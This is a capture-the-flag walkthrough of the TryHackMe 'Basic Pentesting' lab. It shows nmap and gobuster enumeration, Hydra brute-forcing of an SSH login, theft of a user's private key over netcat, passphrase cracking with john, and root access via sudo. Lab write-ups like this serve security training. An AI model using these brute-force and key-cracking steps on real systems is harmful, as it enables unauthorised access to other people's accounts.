# TryHackMe-Basic Pentesting

>Abdullah Rizwan  | 07:04 PM | 1st November , 2020

## NMAP

```

Nmap scan report for 10.10.207.136                                        
Host is up (0.17s latency).                                                                                                                         
Not shown: 994 closed ports          
PORT     STATE SERVICE     VERSION                                                                                                                  
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                                                                                                      
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)                                                                                      
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)                                                                                     
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)                                                                                   
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))                                                                                           
|_http-server-header: Apache/2.4.18 (Ubuntu)                                                                                                        
|_http-title: Site doesn't have a title (text/html).                                                                                                
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)                                                                              
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 
8009/tcp open  ajp13?                                                                                                                               
| ajp-methods:                                                                                                                                      
|_  Supported methods: GET HEAD POST OPTIONS                                                                                                        
8080/tcp open  http-proxy                                                                                                                           
| fingerprint-strings:                                                                                                                              
|   ms-sql-s, oracle-tns:                                                                                                                           
|     HTTP/1.1 400                                                                                                                                  
|     Content-Type: text/html;charset=utf-8                                                                                                         
|     Content-Language: en                                                                                                                          
|     Content-Length: 2243                                                                                                                          
|     Date: Sun, 01 Nov 2020 14:11:05 GMT                                                                                                           
|     Connection: close                                                                                                                             
|     <!doctype html><html lang="en"><head><title>HTTP Status 400                                                                                   
|_    Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font
ily:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-c
olor:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;
color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name 
{color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/
submit.cgi?new-service :             
SF-Port8080-TCP:V=7.80%I=7%D=11/1%Time=5F9EC1F9%P=x86_64-pc-linux-gnu%r(or 
SF:acle-tns,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charse 
SF:t=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\ 
SF:x20Sun,\x2001\x20Nov\x202020\x2014:11:05\x20GMT\r\nConnection:\x20close 
SF:\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Sta 
SF:tus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"te 
SF:xt/css\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;backgro 
SF:und-color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,s 
SF:ans-serif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x 
SF:20{font-family:Tahoma,Arial,sans-serif;color:white;background-color:#52 
SF:5D76;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;c 
SF:olor:black;background-color:white;}\x20b\x20{font-family:Tahoma,Arial,s 
SF:ans-serif;color:white;background-color:#525D76;}\x20p\x20{font-family:T 
SF:ahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}\x2 
SF:0a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height: 
SF:1px;background-color:#525D76;border:none;}</style></head><bod")%r(ms-sq 
SF:l-s,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=utf 
SF:-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\x20Su 
SF:n,\x2001\x20Nov\x202020\x2014:11:05\x20GMT\r\nConnection:\x20close\r\n\ 
SF:r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Status\x 
SF:20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"text/cs 
SF:s\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;background-c 
SF:olor:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-s 
SF:erif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x20{fo 
:0{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:1px;b 
SF:ackground-color:#525D76;border:none;}</style></head><bod");
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel                                                                               
                                     
Host script results:                                                                                                                                
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s                                                                                       
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:                                                                                                                                 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)                                                                                                           
|   Computer name: basic2                                                                                                                           
|   NetBIOS computer name: BASIC2\x00                                                                                                               
|   Domain name: \x00                                                                                                                               
|   FQDN: basic2                                                                                                                                    
|_  System time: 2020-11-01T09:11:08-05:00                                                                                                          
| smb-security-mode:                                                                                                                                
|   account_used: guest                                                                                                                             
|   authentication_level: user                                                                                                                      
|   challenge_response: supported                                                                                                                   
|_  message_signing: disabled (dangerous, but default)                                                                                              
| smb2-security-mode:                                                                                                                               
|   2.02:                                                                                                                                           
|_    Message signing enabled but not required                                                                                                      
| smb2-time:                                                                                                                                        
|   date: 2020-11-01T14:11:08                                                                                                                       
|_  start_date: N/A                                                                                                                                 
                                                                                                                                                    
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.02 seconds                                               

```

## PORT 80

<img src="https://imgur.com/OLJ7xaK.png"/>

## PORT 8080

<img src="https://imgur.com/3V494fv.png"/>

## Smb Shares

Port 139 and 445 are open see lets see if we can access the samba shares 

<img src="https://imgur.com/IT3LDqi.png"/>

<img src="https://imgur.com/EOVK7av.png"/>

From the `staff.txt` that we just grabbed , we can find two usernames `jan` and `kay`.

```
Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)

-Kay

```

## Gobuster

Running gobuster we can find a directory `/development`

```
gobuster dir -u http://10.10.207.136/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.207.136/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/11/01 19:18:49 Starting gobuster
===============================================================
/development (Status: 301)
Progress: 3698 / 220561 (1.68%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/11/01 19:20:02 Finished
===============================================================

```

<img src="https://imgur.com/Q0ItoLg.png"/>

`j.txt`
```
For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

```

`dev.txt`

```

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

```
## Hydra

Now jan is the username we found and it has a weak password so lets bruteforce it using hydra and we know that there is ssh runnin on the box so,

```
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.207.136 
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-01 19:27:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.207.136:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 14344223 to do in 1358:22h, 16 active
 
t[STATUS] 112.00 tries/min, 336 tries in 00:03h, 14344063 to do in 2134:32h, 16 active
tt
[22][ssh] host: 10.10.207.136   login: jan   password: armando

```

<img src="https://imgur.com/FLDBsrg.png"/>

Visti kay's home directory and there you can read `.ssh/id_rsa` private key for logging into ssh , send and receive it through netcat

<img src="https://imgur.com/WDpCcKJ.png"/>

But we still cannot login because that `id_rsa` is password protected

<img src="https://imgur.com/1KZChBk.png"/>

Use `ssh2john` to get hash of `id_rsa` file

```
root@kali:~/TryHackMe/Easy/BasicPentesting# /usr/share/john/ssh2john.py id_rsa  > hash_for_id_rsa
```
Now run `john hash_for_id_rsa`

```
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
0g 0:00:00:56  3/3 0g/s 2748Kp/s 2748Kc/s 2748KC/s pigr3sr..pigr0ts
0g 0:00:00:57  3/3 0g/s 2760Kp/s 2760Kc/s 2760KC/s jalyoun..jalyof4
0g 0:00:00:58  3/3 0g/s 2772Kp/s 2772Kc/s 2772KC/s 1llgod..1llgu1
0g 0:00:05:23  3/3 0g/s 2294Kp/s 2294Kc/s 2294KC/s fcp0luf..fcp0l46
0g 0:00:05:24  3/3 0g/s 2297Kp/s 2297Kc/s 2297KC/s nadah76..nadahro
0g 0:00:06:36  3/3 0g/s 2351Kp/s 2351Kc/s 2351KC/s gaudlsd..gaudsk3
0g 0:00:07:21  3/3 0g/s 2381Kp/s 2381Kc/s 2381KC/s civlup42..civl12mt
0g 0:00:07:22  3/3 0g/s 2384Kp/s 2384Kc/s 2384KC/s adiskak2..adiskuas
0g 0:00:09:14  3/3 0g/s 2527Kp/s 2527Kc/s 2527KC/s cornsexice..cornsexto1
0g 0:00:09:15  3/3 0g/s 2528Kp/s 2528Kc/s 2528KC/s cujkdc1..cujkdd4
0g 0:00:09:16  3/3 0g/s 2530Kp/s 2530Kc/s 2530KC/s bslhmf6..bslhm82
0g 0:00:09:17  3/3 0g/s 2532Kp/s 2532Kc/s 2532KC/s psyctiu..psyct29
0g 0:00:09:18  3/3 0g/s 2534Kp/s 2534Kc/s 2534KC/s tr00ge1..tr00gak
0g 0:00:09:19  3/3 0g/s 2536Kp/s 2536Kc/s 2536KC/s kmdufs1..kmduf6q
0g 0:00:12:52  3/3 0g/s 2458Kp/s 2458Kc/s 2458KC/s ecicos7..ecicots
0g 0:00:12:53  3/3 0g/s 2460Kp/s 2460Kc/s 2460KC/s eussce7..eussc14
0g 0:00:12:54  3/3 0g/s 2461Kp/s 2461Kc/s 2461KC/s exxza8f..exxzay!
0g 0:00:12:55  3/3 0g/s 2463Kp/s 2463Kc/s 2463KC/s eevzco5..eevzcuk
0g 0:00:12:56  3/3 0g/s 2464Kp/s 2464Kc/s 2464KC/s ublhl..ublni
0g 0:00:12:57  3/3 0g/s 2466Kp/s 2466Kc/s 2466KC/s 0zjnhb..0zjnd4
0g 0:00:12:58  3/3 0g/s 2467Kp/s 2467Kc/s 2467KC/s l4zb3n..l4zpay
0g 0:00:12:59  3/3 0g/s 2469Kp/s 2469Kc/s 2469KC/s hfu71s..hfu706
0g 0:00:13:01  3/3 0g/s 2471Kp/s 2471Kc/s 2471KC/s 4s18le..4s18cw
0g 0:00:13:02  3/3 0g/s 2473Kp/s 2473Kc/s 2473KC/s mcjau03..mcjau25
0g 0:00:13:03  3/3 0g/s 2474Kp/s 2474Kc/s 2474KC/s cim0cno..cim0c11
beeswax          (id_rsa)

```
<img src="https://imgur.com/z0d6Xi2.png"/>

Now to become root we can run ALL commands

```
Matching Defaults entries for kay on basic2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kay may run the following commands on basic2:
    (ALL : ALL) ALL
kay@basic2:~$ 

```
so `sudo bash`


<img src="https://imgur.com/SYNGX9N.png"/>